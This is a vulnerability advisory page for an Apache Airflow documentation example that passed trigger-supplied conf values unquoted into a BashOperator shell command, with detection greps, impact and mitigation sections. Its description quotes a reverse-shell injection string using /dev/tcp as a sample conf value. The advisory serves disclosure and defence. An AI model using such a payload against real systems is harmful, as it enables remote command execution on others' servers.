CVE-2026-42252
Analyzed Analyzed - Analysis Complete
Command Injection Risk in Apache Airflow Documentation Example

Publication date: 2026-06-01

Last updated on: 2026-06-02

Assigner: Apache Software Foundation

Description
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 β€” the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-01
Last Modified
2026-06-02
Generated
2026-06-21
AI Q&A
2026-06-01
EPSS Evaluated
2026-06-20
NVD
CVE-2026-42252
EUVD
EUVD-2026-33591
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
apache airflow From 3.0.0 (inc) to 3.2.2 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-1336 The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Detection Guidance

This vulnerability arises from unsafe usage of the BashOperator in Apache Airflow DAGs, where user-supplied parameters from dag_run.conf are passed directly into bash_command without proper sanitization or quoting, leading to potential shell injection.

To detect if your system is vulnerable, you should audit your Airflow DAG code for instances where BashOperator is used with bash_command referencing dag_run.conf values directly and without shell-quoting or sanitization.

There are no specific network detection commands provided in the resources, but you can search your DAG files for patterns like:

  • grep -r "BashOperator.*dag_run.conf" /path/to/your/airflow/dags
  • grep -r "bash_command=.*{{ dag_run.conf" /path/to/your/airflow/dags

Additionally, monitoring for suspicious outbound connections from Airflow workers (such as unexpected TCP connections to unknown hosts or ports) could indicate exploitation attempts, but no specific commands are provided in the resources.

The recommended mitigation is to upgrade to apache-airflow version 3.2.2 or later, which includes corrected documentation and safer usage patterns.

Executive Summary

This vulnerability involves Apache Airflow's documentation showing an unsafe example where the BashOperator uses a Jinja template to pass parameters from dag_run.conf directly into a bash command without any quoting or sanitization.

If a Dag author copied this example verbatim into their deployment, users with permission to trigger the Dag could inject shell metacharacters via the conf field, potentially executing arbitrary shell commands on the worker.

The issue was a documentation inconsistency: while the BashOperator docs warned against this unsafe pattern, the Core Concepts - Dag Run document showed the unsafe example, which could mislead users.

The vulnerability was addressed by updating the documentation to include explicit shell quoting and safety warnings, helping users avoid insecure coding practices.

Impact Analysis

If your Airflow deployment uses Dag code modeled on the vulnerable documentation example, an authenticated user with permission to trigger Dags could exploit this vulnerability to perform shell command injection.

This could allow the attacker to execute arbitrary commands on the Airflow worker, potentially leading to unauthorized access, data compromise, or disruption of workflow execution.

Such an attack could be particularly impactful in multi-team or hosted environments where trigger API access is exposed.

Mitigation Strategies

To mitigate this vulnerability, users should upgrade to apache-airflow version 3.2.2 or later, which includes corrected documentation and safer usage patterns for the BashOperator to prevent shell injection.

Additionally, avoid using the unsafe pattern of passing dag_run.conf values directly into bash_command without proper quoting or sanitization.

Review and update any existing DAG code modeled on the pre-correction documentation example to include explicit shell-quoting and safety caveats when using BashOperator with dynamic parameters.

Compliance Impact

The provided context and resources do not contain information about how this vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-42252. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart